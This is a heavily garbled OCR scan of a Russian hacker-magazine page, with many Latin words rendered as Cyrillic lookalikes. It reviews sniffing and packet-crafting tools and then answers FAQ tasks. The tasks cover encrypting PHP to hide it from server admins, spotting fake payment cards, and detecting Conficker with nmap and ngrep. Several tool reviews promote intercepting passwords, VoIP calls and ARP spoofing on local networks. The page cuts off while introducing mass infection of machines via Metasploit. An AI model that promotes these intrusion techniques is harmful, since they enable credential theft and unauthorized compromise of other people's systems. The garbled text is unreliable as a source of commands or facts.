но. В результате, получаем одну единственную 
утилиту с 1000 и одним применением. В самом 
простом варианте ЫеЕсаІ: позволяет создавать 
ТСР и ШР соединения, умеет «слушать» входя- 
щие соединения (можно приказать тулзе ждать 
соединения только с указанных тобой адресов и 
даже портов!), может сканировать порты, разре- 
шать 0145-запросы, посылать любые команды со 
стандартного ввода, выполнять заранее предо- 
пределенные действия в ответ на соединение, 
которое слушает «котенок» (логотип нетката], 
делать Нех-дамп отправленных и полученных 
данных (а вот и функции снифера] и много- 
много чего еще. Вообще, ЫеЕсаІ: — это мощ- 
нейшее средство для отладки и эксплуатации 
различных уязвимостей, поскольку позволяет 
установить соединение любого типа, который 
тебе нужен. Оригинальная версия ІХІеЮар была 
выпущена еще в 1995 году, но, несмотря на 
бешеную популярность проект, не развивается. 
Но сама концепция программы, совмещающая 
предельную простоту и, в тоже время, огромную 
функциональность, привела к появлению других 
реализаций. Одной из самых интересных стала 
Зосаі, которая дополняет оригинальный Ыеісаі: 
для поддержки 55Е-шифрования, 50СК5 прокси 
и т.д. С не меньшим успехом ее можно юзать 
как соксифаер, безопасный туннеллер, снифер 
и т.д. Помимо этого, есть ІМсаІ, предоставляю- 
щий дополнительные функции, а также гурісаі, 
Ыеісаіб, РЫеІсаІ, ЗВй и др. 

САІ N АЫО АВЕІ 

Ѵ\ГОГОЛОХЮ. ІТ/САІ N. НТМ I. 

ПЛАТФОРМА: ѴѴІ N Ц0ѴѴ8 

Если ищешь утилиту для восстановления все- 
возможных паролей, то лучшего инструмента, 
пожалуй, не найти. В буквальном смысле «уни- 
версальный солдат» готов на все. Допустим, 
тебе нужно вспомнить пароль и личные 
данные, сохраненные в браузере. Не про- 
блема! Клик по нужной иконке — и они твои! 
Интересуешься пассами, которые непрерывно 
передаются по твоей локалке (и, следователь- 
но, их хорошо бы шифровать)? Воспользуйся 
встроенным снифером. Правда, понадобится 
драйвер ѴѴіпРсар, но не беда — в случае необ- 
ходимости Саіп & АЬеІ заинсталлит его прямо 
во время установки. А далее — делай, что 
хочешь. Замечу, что дело не ограничивается 
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МОЩЬЮ ШИРОКОВЕЩАТЕЛЬНОЙ РАССЫЛКИ АКР-ПАКЕТОВ 



одним перехватом паролей от всевозможных сервисов, 
начиная от банальных РТР/РОРЗ и заканчивая экзотикой, 
вроде ключей для Расііиз-серверов. Реально перехватить 
идентификационные данные и сами разговоры клиентов 
ѴоІР-телефонии (но только, если используется 5ІР-протокол] 
или даже пакеты с голосовыми данными, из которых 
несложно извлечь запись разговора с помощью специ- 
альных конвертеров. Чтобы не было проблем со свитчами, 
прога отлично владеет приемом АРР-спуфинга. Умелые 
манипуляции с МАС-адресами и заголовками пакетов при- 
водят к результатам: снифер работает почти безотказно 
(хотя это палится любыми 105). С помощью 15 встроенных 
утилит Саіп & АЬеІ может взломать 25 типов хешей, про- 
вести исследование беспроводной сети, а также выполнить 
еще целый ряд уникальных действий (нацеленных, прежде 
всего, на подбор или расшивку паролей]. 



Ы6ВЕР 

Ы6КЕР.501ЖСЕР0ВСЕ.ЫЕТ 

ПЛАТФОРМА: *І\ІІХ, ЕСТЬ ПОРТ ПОД 
ѴѴІШ0ѴѴ5 

Что такое Ыдгер? Берем известную никсовую утилиту дгер 
(ту, что находит на вводе строки, отвечающие заданному 
регулярному выражению, и выводит их] и натравливаем 
ее на сетевой трафик. Точно так же, как вывод на какую- 
то команду можно ограничить строками с определенным 
содержимым, можно фильтровать и трафик. Ыдгер позво- 
ляет выделить из перехваченного трафика любые данные, 
отвечающие регулярным выражениям. Ыдгер понимает 
ІРѵ4/6, ТСР, ІІБР, I С М Р ѵ4/ 6 , І0М по ЕЬеІхпеБу и другим тех- 
нологиям (РРР, 5ЫР, РББІ, Токеп Ріпд). Традиционно пдгер 
используется для анализа текстовых протоколов, вроде 



ИНТЕРАКТИВНОЕ МАНИПУЛЯЦИЯ С ПАКЕТАМИ С ПОМОЩЬЮ 
5САРУ — ОДНОУДОВОЛЬСТВИЕ 
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• Классный мануал 
по ЫеЮаС заѵаде.пеі. 
аи/МБѴѴіпсІоѵѵз/ЫппІ 
/пс.ЫтІ . 

• Инструкция по 
запуску Беару под 
ѴѴІ ПСІ0ѴѴ5 : 
ігас.зессіеѵ.огд/ 
зсарѵ/ѵѵікі/ 
ѴѴіпсІоѵѵзІпзІаЦабоп 
Сиісіе. 



> СІѴСІ 

Упомянутые в статье 
утилиты и х-іооіг’ы 
необязательно качать 
из инета: они есть на 
нашем 0Ѵ0! 




ШВЕЙЦАРСКИЙ НОЖИКХАКЕРА — ЫЕТСАТ 



НТТР, 5МТР, РТР и т.д. Использовать ее для выявления 
аномальной активности в Сети (вирусы, черви и т.д.] или 
перехвата данных из авторизаций НТТР, РТР — неважно. 

ЫЕМЕ5І5 

МЕМЕ8І5.501ІВСЕР0ВСЕ.ЫЕТ 

ПЛАТФОРМА: *ЫІХ, ѴѴІІХЮ0ѴѴ5 

Эта консольная тулза для разборки сетевых пакетов, их моди- 
фикации и дальнейшей инжекции в Сеть не раз выручала меня 
в тестировании ІБ5, файрволов и сетевых демонов. Благодаря 
работе через консоль, Ыетезіз легко приспосабливается к 
любым сторонним скриптам для пен-теста. Оригинальная вер- 
сия может распарсить и инжектировать произвольные пакеты 
АРР, БЫ5, ЕТНЕРЫЕТ, ІСМР, І6МР, ІР, 05РР, РІР, ТСР и ІІБР 

НРШ62 

ѴѴѴѴѴѴ.НРШ6.0КС 

ПЛАТФОРМА: *ЫІХ, МАС05 X, 

ѴѴІ N ООѴѴБ 

Вот еще одна миниатюрная утилита, позволяющая отсылать 
произвольные ІСМР, ББР, ТСР и ВАѴѴ-ІР пакеты и отобра- 
жать ответы на них. Отправить такой пакет не сложнее, чем 
пропинговать нужный хост. Интерфейс полностью пере- 
нят у любимого Ріпд’а — отсюда и название программы. 
Изначально тулза была разработана в качестве замены 
стандартным ріпдДгасегоіФе, работа которых часто обламы- 
вается из-за файрволов. Поэтому в Нріпд2 по умолчанию 
есть продвинутый Ітасегоиію и режим ІР-фрагментации. 
Тулзу часто используют для проверки настройки файрвола, 
бпдегргіпЕа и сканирования портов. И, конечно же, просто 
для отправки в Сеть нужного пакета. 

ЫЕТѴѴОВК МШЕВ 

ЫЕТѴѴОВКМШЕВ.БОиВСЕГОВѲЕ.ЫЕТ 

ПЛАТФОРМА: ѴѴІІХЮ0ѴѴ5 

Добротный снифер для ѴѴіпсІоѵѵз, который всячески пытается 
выведать как можно больше инфы о локальной сети. ЫеЕлюгк 
Міпег предназначен не столько для перехвата данных (хотя, 
безусловно, он это умеет] — сколько для анализа инфра- 
структуры локалки (операционки на хостах, открытые сессии, 
Ьозіпаппе’ы, открытые порты на узлах]. В отличие от многих 
^илит, делает он это исключительно пассивно, т.е. без гене- 
рации трафика, по которому может быть определен фа кт 
сканирования. Для анализа ОС на каждом из узлов использу- 
ются проверенные механизмы ЕпдегргіпБа, базы утилиты рСК 
( ІсатІиксогесІиппр.сх/рОкзЫпп ]. а также метод анализа БНСР- 
пакетов из тулзы Баіогі (і іЦрУ/тѵѵѵеЬ.саЫеопе.пеДхпіЬ ]. 

Если говорить о перехвате данных, то ЫеЕ/ѵогк Міпег сни- 
мет с «эфира» (или из заранее подготовленного дампа в 
РСАР-формате] файлы, сертификаты, изображения и дру- 
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АШ&АВЕЦ ПОМИМО ПАРОЛЕЙ И ДРУГИХ 
ИВЫЧНЫХ ДАННЫХ, ИМЕЕТ ВСТРО- 
іЫЕ СРЕДСТВА ДЛЯ ГРАБИНГА ѴОІР- 
РАЗГ0В0Р0В И ДАННЫХ АВТОРИЗАЦИИ 5ІР 



гие медиа, а также пароли и прочую инфу для авторизации. 
Полезная возможность — поиск тех участков данных, что 
содержат ключевые слова (например, логин пользователя]. 

5САРУ 

ѴѴѴѴѴѴ.5ЕС0ЕѴ.0К6/РКСМЕСТ5/5САРѴ 

ПЛАТФОРМА: *ЫІХ, ЕСТЬ ПОРТ ПОД 
ѴѴІЫЦ0ѴѴ5 

Мизі-Ьаѵе для любого хакера, представляющий собой мощ- 
нейшую тулзу для интерактивной манипуляции пакетами. 
Принять и декодировать пакеты самых различных про- 
токолов, ответить на запрос, инжектировать модифициро- 
ванный и собственноручно созданный пакет — все легко! 

С ее помощью можно выполнять целый ряд классических 
задач, вроде сканирования, ІгасогіФе, атак и определения 
инфраструктуры сети. В одном флаконе мы получаем замену 
таких популярных утилит, как: Ьріпд, птар, агрзрооб агр- 
зк, агріпд, Арбитр, ІеЖегаІ, рОІ и т.д. В то же самое время 
5сару позволяет выполнить любое, даже самое специфиче- 
ское задание, которое никогда не сможет сделать уже соз- 
данное другим разработчиком средство. Вместо того чтобы 
писать целую гору строк на Си, чтобы, например, сгенери- 
ровать неправильный пакет и сделать фаззинг какого-то 
демона, достаточно накидать пару строчек кода с использо- 
ванием 5сару! У программы нет графического интерфейса, а 
интерактивность достигается за счет интерпретатора Руібоп. 
Чуть освоишься, и тебе уже ничего не будет стоить создать 
некорректные пакеты, инжектировать нужные фреймы 
802.11, совмещать различные подходы в атаках (скажем, 

АРР сасбе роізопіпд и ѴІ_АЫ Ьорріпд) и т.д. Разработчики 
сами настаивают на том, чтобы возможности 5сару исполь- 
зовались в других проектах. Подключив ее как модуль, легко 
создать утилиту для различного рода исследования локал- 
ки, поиска уязвимостей, ѴѴі-Рі инжекции, автоматического 
выполнения специфических задач и т.д. 

РАСКЕТН 

РАСКЕТН.501ЖСЕР0ВСЕ.МЕТ 

*ЫІХ, ЕСТЬ ПОРТ ПОД ѴѴІШ0ѴѴ5 

Интересная разработка, позволяющая, с одной стороны, 
генерировать любой еібегпеі: пакет, и, с другой, отправ- 
лять последовательности пакетов с целью проверки 
пропускной способности. В отличие от других подобных 
тулз, раскеіЬ имеет графический интерфейс, позволяя 
создавать пакеты в максимально простой форме. Дальше 
— больше. Особенно проработано создание и отправка 
последовательностей пакетов. Ты можешь устанавливать 
задержки между отправкой, слать пакеты с максималь- 
ной скоростью, чтобы проверить пропускную способ- 
ность участка сети (ага, вот сюда-то и будут ддосить] и, 
что еще интереснее — динамически изменять парамет- 
ры в пакетах (например, ІР или МАС-адрес).^с 





ПРОСТАЯ ИНЖЕКЦИЯ ПАКЕТОВ 
С ПОМОЩЬЮ ЫЕМЕ5І5 




> іпіо 



Подробнее про 
0х4553-Іп1;егсер1;егты 
можешь прочитать 
в статье Криса Ка- 
сперски ( /ѵѵѵѵѵ. хакер . 
ги/тадагіпе/ха 
/1 1 5/060/1 .азр ]. 
РОР-версия будет на 
диске. 
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ЫЕТѴѴОККМШЕК, КРОМЕ СНИФИНГАДАННЫХ, ПОПЫТАЕТСЯ 
РАЗВЕДАТЬ КАК МОЖНО БОЛЬШЕ О ЛОКАЛ КЕ 



РЕДАКТИРОВАНИЕ ПОЛЕЙ ПАКЕТА С ПОМОЩЬЮ 601- 
ИНТЕРФЕЙСА РАСКЕТН 
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ЗАДАЧА: 



ІЗАШИФРОВАТЬ КОД РНР-СКРИПТА 

РЕШЕНИЕ: 



Как скрыть код РНР-скриптов отхостера или от настойчивых администраторов 
сервера? Правильно — зашифровать :]. Но вотчем? Однозначный ответнайти 
нетак-то просто, ибо разнообразных продуктов на сегодняшний день более 
чем достаточно. Большинство используют в своей работе одинаковые либо 
схожие алгоритмы. Это сводит на нет все усилия по сокрытию кода. Из наибо- 
лее популярных криптеров исходного РНР-кода отметим следующие: 

1. Ргее РНР Епсосіег— ,__ч . .сот — удобный бесплатный 

онлайн-сервис по кодированию РНР-скриптов. Обладает статическим алго- 
ритмом шифрования; функции обфускатора не имеет. 

2. РНРБоскШ — ѵѵѵѵѵѵ.рбріоскіі.сот — платный продукте наличием качествен- 
ного обфускатора. Позволяетустанавливать триальный срок работы скриптов 
и привязку кдоменам/ІР-адресам. 

3. РНРСірЬег — ѵѵѵѵѵѵ.рЬрсірЬег.сот — функциональный онлайн-сервис, прав- 
да, платный. При наличии лицензии™ без проблем сможешь ставить копирай- 
ты на шифрованные скрипты. Огорчаетлишь отсутствие функции обфускатора. 

4. СІМСгурІо — сп-зокѵѵаге.согт — исключительно коммерческий продукт, 
отличается качественной обфускацией кода. 

5. СосІеІ_оск— г — популярная утила для кодирования РНР- 

скриптов, функции обфускации нет. 

6. ТгиеВид РНР ОЫизсаіог& Епсосіег — — протектор, 

обладающий собственным алгоритмом сжатия. Также присутствует функция 
обфускации и оптимизации исходного РНР-кода. Основной минусутилы — 
статический алгоритм декодирования скриптов. 

7. 2огех РНРСгуріЗ — огех.г — платный онлайн-сервис. Демо-версия 
присутствует, функции обфускатора нет. 

Я перечислил лишь несколько популярных проектов. На самом деле, подобных 
продуктов намного больше, и в их поиске тебе поможет ѵѵѵѵѵѵ.аоодіе.сопп :]. 
Теперь рассмотрим порядокдействий по сокрытию содержимого РНР-скрипта 
при помощи онлайн-сервиса ѵѵѵѵѵѵтогех.іпіо : 

1. Берем скрипт, код которого нам необходимо закриптовать. Например: 



<? 

есТю ( ' СгурД Ме ' ) ; 
?> 



2. Заходим на сайт онлайн-сервиса \ тоге; ѵГо. 

3. Выбираем в меню сервиса «2огех РНР Сгур{2» и кликаем по ссылке. 
4.3аполняем следующие поля: 



20ГСХ Т РНР СгуріЕ 





- ГтянЪ № 




- Елі4^МіЛнН№ 


| Объыу | 


N мміпадлі 


Лт ■■ Ь ііні» 1 


- 1. ■«*! БлЛНцль 


МсМЬг Г4МТН- Еіѵйі а*+ 

Г ІЧІ'Ч <ч«#ч] 


■ ШІОѵМ 


“іл | ; № 


- ||<вдтС] 


ъ,ѣ,тт, -ЙМІ ■ I. ■ ■ -і 




ШМН-ЧНІ [ 

1 ***' ! 2 

ЧІЧ1ЯЯЛ 

Нііёйеий: 



Криптуем код рЬр-скрипта 



5. Жмем батон и получаемлинкнаархивсшифрованнымскриптом. 

6. Распаковываем архив, внутри видим два файла: 

• наш_скрипт.рбр; 

• декодер_для_нашего_скрипта.рбр. 

7. Открываем наш_скрипт.рбр и проверяем криптованный код: 

<? /*8сгірД епсосіесі изіпд 2огех РНР СгурД2 міДІі сіето 
ассоипД — ЬДДр : / /гогех . іпДо* / 

$ сгурД 2 = 1; $ сгурД 2 2 1 ІЬ = 1; $сгурД 2 _Дпате = 

Ъазепате ( РІЬЕ ) ; $ сгурД 2_с1раДЪ. = сіігпате ( 

РІЬЕ ) ; ІД ( ! Ді1е_ехізДз ( " $ сгурД 2_с1раДЪ./ сгурД 2 1 . 

рНр" )) { сііе ( " &пЬзр; <Ьг>8сгірД ОесоОег поД Доипсі — 

Раіі До ехесиДе зсгірД ! <Ьг>&пЬзр; <ЬгхЬг зІ2е=1><ДопД 
зІ2е=2>зсгірД епсосіе изіпд <а НгеД= ' Ъ.ДДр : / / 
гогех . іпДо ' >2огех РНР СгурД2</а></ ДопД>" ) ; } 
іпсіисіе ( " $сгурД 2 _сіраДІі/сгурД 2 І .рНр" ) ; геДигп; ?> 
АУАВД/7УТѴгб8+В2біЬЬ0(і+1РзКе21Еа+ЬТЗіЬуДпЕдд5:кг2МддТе 
Д + 9 : гѵхс 1с О 6АШУОХРО / 7 8 а9и /N 2 2АсТдУ2 +Аг04 Дра7 дОК2 8 1 0 ІМ 
ѵОР22І5ѴВебЗѵ8Хд10НбкаР4сНХеКІ7Ь.8+Н2+ІаМХрОзБіСН2РВХда 
РЛгаКуРОа4 ОдДК/ѵ08 ] 71кМ0М9д8ѵЖ2ЬеѴ1Оѵ7икиз4иШАТСг 

ЫТеѴдНОНѵРпуРѵ+ЗуІ з 34іх1крсКЕигзбѲ/8390ЛРВиа4уШНг8дб 
97 4І2ТШС8еЗай2ЕУа+сІ7оЕаеВуСС<21ід™іІха(2РНо7 2 Т/ 2 зМОт/к™ 
МсЗѵБІІКг 5 г б 0 з Д ЬЫ еМ +те]о 3 Ѵд А4 с о Д О 8 КЬ пЫ2 Н2 8 6 2 Ы 2 р кТЗс 7 е Дю 2 
Д 3 пУРАдаБ бКДЪРІШгтеб аУ + 9УСІЛЭР+ 9 сТКЗ ІЫКДОТдКРМКкЕСс Д 2 <ЭД 
1с 1 2МѵБо4 2 + 7у ДАсшб Дхе2шЬС1ВІ 5 ечл+рД ЗѴЕМг з еНСсрІрИ / а8 б 2 И 
а0тІ2РДп1іиН4РР90кѵ^СЬу7+дѵ\г9 Д1к2Уо= 



• Зоигсе Рііе // наш пхп-скрипт 

• Бесосіег Рііепаше // название файла декодера 

• ОиДриД 2ір // архив с результатом (скрипт + декодер) 

• ЫтіД До НозД // ограничение по хосту 

• ЬітіД До ІР // ограничение по ІР 



Каквидишь, все пристойно. 

Ѳ. Ну и в завершение — тестируем декодер. 

Я привел в пример л ишь один из многочисленных онлайн -сервисов по шиф- 
рованию кода в РНР-скриптах. Твой выборзависиттолько от собственных 
предпочтений и требований к алгоритму. 
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ЗАДАЧА: ОПРЕДЕЛИТЬ ОБФУСКАТОР, КОТОРЫМ ЗАШИФРОВАН 

РНР-СКРИПТ 

РЕШЕНИЕ: 

В последнее время появилосьогромное число различных обфускаторов 
и протекторов РНР-кода. С каждым разом все труднее понять, чем именно 
закриптован скрипт: зачастую восстановить сорец — проще, чем определить 
тип обфускатора. Поэтому мы воспользуемся специальной утилой под названи- 
ем РСІ_5 РНРЮ, идеально подходящей под наши цели. Прога предназначена 
для определения протекторов и обфускаторов РНР-кода и умеет распознавать 
более 20 различныхалгоритмов, среди которых: 

Определяемые протекторы : 

• ТгиеВид РНР Епсосіег 1.0.2 (іпсі. С2ІР) , 1. 0.3/1. 0.4 

• ЫиЗрЬеге ЫиСосіег 

• 2еп<1 Епсосіег / 2епс1 ЗаіеСиагсі ЗиіЬе 

• ВуЬеКип РгоДесДог Дог РНР 

• ЗошгсеСор (іпсі. ргоДесДіоп тосіиіе) 

• СосІеЬоск (іпсі. ргокесЬіоп тосіиіе) 

• ЗоигсеСиагсІіап Дог РНР 

• РНРСірЬег 

• рЬрЗНІЕЬБ 

• СИСгурДо 

• РНТМЬ Епсосіег 

• іопСиЬе РНР Епсосіег 

• РНР ЬоскІД ! 1.8, 2.0 (іпсі. С2ІР) 

• ОЬДизс (Вазіс/Иогтаі , ЗДюѵЮЪДизсаДе) 

• 2огех РНР СгурД2 (іпсі. ргоДесДіоп тосіиіе) 

• депсосіег 

• БѴ7еЬЕпсос1ег 

• Егее РНР Епсосіег 

• РНР СотрасД 

• ТгиеВид РНР ОЬДизсаДог 1.1 

• РНРСосіег / еАссеІегаДог 

Определяемые обфускаторы: 

• ЗетапДіс Безідпз ОЬДизсаДог 

• РНР БеДепсІег 

• РНР ЬоскІД ! (ОЬДизсаДіоп тосіе) 

• КаігІаЬз РНР ОЬДизсаДог 

• РОВЗ — РНР ОЬДизсаДог 



о/ЮпУ МапНипй 
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Істгі.рЬр і 


3 


Ргее РНР Ёпсойег 
ѵѵѵиѵі' . Ггееріірепсосіег . Сот 


рнріо Епдіпе 1.1.26 
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Определяем тип обфускатора/протектора рЬр-кода 



Рассмотрим подробный алгоритм действий для решения поставленной зада- 
чи: 

1. Сливаем утилу РССз РНРЮ с нашего ДВД. 

2. Запускаем ехе’шникрбріб.ехе. 

4. Выбираем закриптованный скрипт, например: 

<?рЪр 

сіе Діпе ( " _ЕЖ1КУРТЕВ_ССШЕ_ " , " еСІтЬЬІмЬЬЕІ ЬТк4иСЦуВпдіШ 
іЛМІІМ4сІЕзідкіЛд02ХЛЖ4 ЬТЕхЛЛ зТд== " ) ; 

ЬеДіпе ( " _Е11СКУРТОК_КЕУ_ " , " сДс<12 08495<15б5еДббе7<1ДД9 Д98 
7б4Ьа") ; 

ЬеДіпе ( "_ВЕСОБЕК_РАТН_" , " ЬесоЬег . рЬр " ) ; //Уои сап 
сЬапде ДЬіз раДЬ До роіпД До ДЬе ЬесоЬег Дііе іп апоДЬег 
ІосаДіоп . 

ІД ( Ді1е_ехізДз (_БЕСОБЕК_РАТН_) ) { іпс1ис!е_опсе (_БЕСОБЕК_ 
РАТН_ ) ; } 

е1зе{есЬо»Бесо<Іег Дііе Ьоез поД ехізД" ;} // КеІаДіѵе ог 
аЬзоІиДе раДЬ До ДЬе ЬесоЬег Дііе 
?> 

5. В окнетулзы видим результат: Ргее РНР Епсобег — ѵѵѵѵѵѵ.ѵѵѵѵѵѵІгеерЬ реп собес 
сот . Соответственно, задача выполнена: протектор успешно определен, а со- 
рец моего скрипта восстановишьсам :]. 

Р.5. Помни, что размер анализируемого утилой скрипта не должен превышать 
1 метра, иначе функциональность не гарантируется. 




ЗАДАЧА: 



] ОТЛИЧИТЬ ПОДДЕЛЬНЫЕ КАРТОЧКИ ѴІ5А/МА5ТЕКСАК0 

ОТ ОРИГИНАЛЬНЫХ 
РЕШЕНИЕ: 



Платежныетерминалы и банкоматы сейчас не стоят разве что в хлебных 
ларьках. Я расскажу, какотличить левую кредитку от оригинала. Для это- 
го я составил небольшой списокхарактерных признаков. Руководству- 
ясь им, ты сможешь без труда определить подделку: 

1. Изучи микропечать вокруглоготипа ѴІ5А. Если она практически не чи- 
тается и стирается с карточки — будьуверен, перед тобой левак! 

2. Следующая важная деталь — голограмма. Фон оригинальной 
голограммы чист, зеркален, а детали изображения легко различимы. 
Основной признак поддельных голограмм — отсутствие объема. Кроме 
того, «левая» голограмма легко отслаивается (как правило, это простая 
наклейка]. Настоящую голограмму невозможно сковырнуть ногтем 
или содрать с кредитки иным способом. 

3. Посмотри на ленту для подписи с обратной стороны карточки. 




На оригинальной ленте в большинстве случаев присутствует фон в виде 
надписи «Маз1;егСагб» или «Ѵіза» (в зависимости оттипа карты). Кроме 
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того, на ленте должен располагаться номер карты и код безопасности. 

4 . Иногда на подделках используется ламинат, нанесенный с обеих 
сторон,— эта прозрачная пленка легко отслаивается по краям, особенно 
если ей немного помочь. 

5 . Первые четыре цифры номера карты (ВІІЧ), продублированные конт- 
растной краской, мо гут стираться с поддельной карточки. На оригинале 
ВІ N стереть невозможно! 

6. Стоит обратить внимание на символы «V» и «МС» (на соответствующих 
типах карт]. Они могут отличаться от стандартных по тол щи не/шири не. 



7 . В ультрафиолетовом свете на поддельных карточках могут отсутство- 
вать специальные изображения (например, летящий голубь на картах 
ѴІ5А]. Вероятнее всего, картинка либо будет размыта, либо ее не будет 
вовсе. 

8. Данные, нанесенные на карточку, обязательно должны совпадать 
сданными, нанесенными на магнитной полосе! 

Хотя карточки международных платежных систем регулярно модернизи- 
руются, следуя вышеописанным инструкциям, ты можешь обезопасить 
себя в большинстве случаев. 



№4 

ЗАДАЧА: ПЕРЕИМЕНОВАТЬ СИСТЕМНУЮ УЧЕТНУЮ ЗАПИСЬ АДМИ- 
НИСТРАТОРА В ѴѴІЫХР/2003 С ПЕРЕМЕЩЕНИЕМ ПРОФИЛЯ 
РЕШЕНИЕ: 

Ты, наверняка, не раз сталкивался с проблемой наличия кириллических 
символов в пути кпрофилюучетной записи (вспомни криво 
работающий теІазрІоіНгатеѵѵогк с учетной записью «Адми- 
нистратор»]. Нормально переименовать учетную записьутебя 
не получалось — приходилось копировать нужные библиотеки 
и вручную прописывать к ним пути. 

Если нужно полностью переименовать учетку вместе с папкой 
%5У5ТЕМВВІѴЕ%\0оситепІ5 апб 5еШпдз\<старое_имя_пользо- 
вателя>, предлагаютебе следующий алгоритм: 

1. Ручное переименование самой учетной записи. Здесь, думаю, 
все понятно. Выполняется через«Панельуправления Учетные 
записи Администратор -> Переименовать». 

2. Копирование профиля в новую папку. Профиль вмес- 
те с содержимым папки %5У5ТЕМВРІѴЕ%\0осиппепІ5апсІ 
5еШпдз\<старое_имя_пользователя> перемещается так: «Панель 
управления Свойства системы Дополнительно Профили 
пользователей-^Параметры». Выделяешь нужный профиль, 
жмешь«копировать» и выбираешь, куда (%БУ5ТЕМ 0РІѴЕ%\ 

Ооситепіз ап б 5еШпдз\<новое имя пользователя^. Профиль 
вместе со всем содержимым папки скопируется по новому пути. 

3. Прописывание пути в реестре кновому распо- 
ложению профиля. Путь прописывается по ад- 



ресу « Н КЕУ_ЕОСАЕ_М АС Н I N Е\50 РТѴѴАРЕ\М ісгозоП\ѴѴі псіоѵѵз 
МТ\СиггепіѴег5Іоп\РгоЕІеЕІ5І\<сиггепІ_ргоЕІе_іб>\РгоЕІеІтадеРаІб» с пос- 
ледующей перезагрузкой. Здесь <сиггвгЛ_рго!іІе_ісІ> определяется по ключу 
РгоІіІеІтадеРаФ, указывающему на расположение папки %5У5ТЕМ 0РІѴЕ%\ 
Оосиппепіз ап б 5еШпдз\<старое_имя_пользователя>. 

4.Удаление старой папки профиля. Больше она не пригодится. 

Напоследок — одно замечание. Скопировать профил ьучетки, под которой™ 
сейчас сидишь, нельзя. Нужно заходить под любой другой из группы «Админист- 
раторы» и копировать оттуда. 




№5 



ЗАДАЧА: 



ѴШКІРЕ0ІАЮК6/ѴШКІ/С0ЫГІСКЕК) ЗАРАЗИЛ КУЧУ МАШИН, И ВСЕ 
ОНИ ВАЖНЫЕ. КАК ИХ ВЫЯВИТЬ? 

РЕШЕНИЕ: 

1. Подход с помощью ММАР. Выявить червя можно сканированием своей 
подсети. Пригодится специальный скрипт, написанный на ІЧМАР5Е — он 
уже был описан в предыдущих номерах. Делается следующей командой: 



пшар -РЫ -Т4 -р139,445 -п -ѵ --зсгір1 = зтЪ-с]песк-ѵи1пз 
--зсгірі-агдз за!е=1 192.168.111.0/24, 



Для крупномасштабных сетей используй команду: 

пшар -зС -РЫ — сі -р445 -п -Т4 --тіп-ЬозІдгоир 256 --тіп- 
рагаііеіізт 64 --зсгір1=зтЪ-сЬеск-ѵи1пз --зсгірі- 
агдз=за!е=1 10.0.0. 0/8 

Из-за особенностей уязвимости рекомендуется натравливать сканер 
на 139 и 445 порты ТСР. В результатах сканирования ты обнаружишь 
записи «Сопбскег: Бікеіу СБЕАІЧ» или «СопІіскег; Бікеіу I N РЕСТЕ О». 

2. Подход с помощью пбРЕР. Функционал пдгер очень богат, напри- 
мер, позволяет в объемахтрафика пробежаться поиском по рауіоасіз 
(это информация, которая хранится в сетевых пакетах в качестве дан- 
ных]. Сигнатура СопІіскег может быть найдена практически во всех 
современных архивах или блогах по информационной безопасности 
— можно смело ее использовать: 



где зсгірі — флаг, указывающий на обращение к скрипту, который уже 
есть в последней версии ІММАР (ІМтар 4.85ВЕТА7]. 
рп — отключает Ботат ІЧате Пезоіиііоп (О N Р) . 
п — отключает проверку на предмет «живости» хоста. 

Отключение вышеназванных опций заметно повышает скорость 
при сканировании. 



пдгер -дсі еіЬО -VI зіпдіе -з 900 -X 

0хе811111111с2 518(141108031с44166813 94(153 7 5153 8аес69(1а0 
4 185еа4184с84 184(184 1с4419ссс4 973 65с4с4с42сес1с4с4с4942 6 
Зс413 892 3Ь(135747 02с32с(1сс4с4с4171696964108а2 03с5Ьсеа95 
ЗЪЪЗс0969 69592 963МЗЗЪ24 699592514181184188с1Ъсс7 0!1732 
49(1077с7 95е441(16с717сЬс4 04сЬ7Ь0405 04с316с686441ес4Ы31 
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Работа ЫМАР по выявлению Сопкіскег 



кк01Ь0с282 3!і:Ь5с1сЬ61к4к95е0с7Г7сЬ73с!.0Ь64к85сі8с7074кс054 
с7 079а9сЮ7а4664еЬ2е244680сМЬ6а8а9аЬаас45сіе7 991с1асЬ0Ь0 
МкееЬеЬ ' ксррогк 445 
апЬ сЗ.3 1т пек 127.0.208.0/24' 

Сначала тебе нужно промониторить сетевую активность и записать 
какую-либо часть трафика снифером, а потом скормитьдамп пдгер’у. 

3. Подход с помощью Меззиз. Популярный сканнертоже не будет 
лишним. Существует специальный плагин [ пеззиз.огд/ріидіпз/іпсіех. 

36036 ). который позволяет прогнать все хосты 
и выявить жертву. Между прочим, назвать ее «просто жертвой» нельзя, 



потому что, по оценкам метрик СѴ55ѵ2, Сопбскег имеет«критический» 
уровень урона (Сгібсаі/ СѴ55 Вазе 5соге : 1 0.0). Для выявления нужно 
проделать следующие шаги: 

.^Обновляемся 

/орк/пеззиз/Ьіп/пеззиз-кексЬ. -сЬеск 
пеззиз-кексЬ із ргорегіу сопкідигесі ко гесеіѵе а 
РгокеззіопаІ кееЬ 

/орк/пеззиз/зЬіп/пеззиз-ирс1аке-р1идіпз 

б) Ищем плагин по номеру 36036 и применяем. 

4. Подход с применением утилиты Института Компьютерных Техноло- 
гий Бонна. 

а) Скачиваем замечательную сетевую утилиту, предназначенную 
лишь для указанной цели. Можно скачать здесь — іѵ.сз.ипі 
бе/ѵѵд/сз/аррІісаОопз/сопІаіпіпд-сопОскег . 

Б^Запускаем командой $ ./зсз2.ру 10.0.0.1 10.0.0.5: 

Зітріе Сопііскег Зсаппег ѵ2 — (С) Ееііх БеЬег, Тііітапп 
Шегпег 2009 

[ШКШШ] 10.0.0.1: N 0 гезропзе кгот рогк 445/кср. 
[ШКШШГ] 10.0.0.2: БпаЫе ко гип Ыекрѵ^РакЬ.Сапопіса1І2е . 
[СЬЕАБ] 10.0.0.3: Міпскжз Зегѵег 2003 К2 3790 Зегѵісе 
Раск 2 [Міпсісжз Зегѵег 2 0 03 К.2 5.2] : Зеешз ко Ье сіеап. 
[ШЕЕСТЕВ] 10.0.0.4: МпЬсжз 5.1 [МпЬсжгз 2000 ЬАЫ 
Мападег] : Зеешз ко Ье іпкескесі Ьу Сопкіскег Б. 

[ШЕЕСТЕВ] 10.0.0.5: МпЬсжз 5.1 [Шп&смз 2000 ЬАЫ 
Мападег] : Зеешз ко Ье іпкескесі Ьу Сопкіскег В ог С. Вопе 

3. Парсим результаты. 



№6 

ЗАДАЧА: КАК С ПОМОЩЬЮ МЕТА5РІ.0ІТ ОРГАНИЗОВАТЬ МАССРУ- 
ТИНГ? 

РЕШЕНИЕ: 

Ничего неприличного :). Массрутинг — это массовое заражение машин 
с использованием известной (или неизвестной) уязвимости. Если 
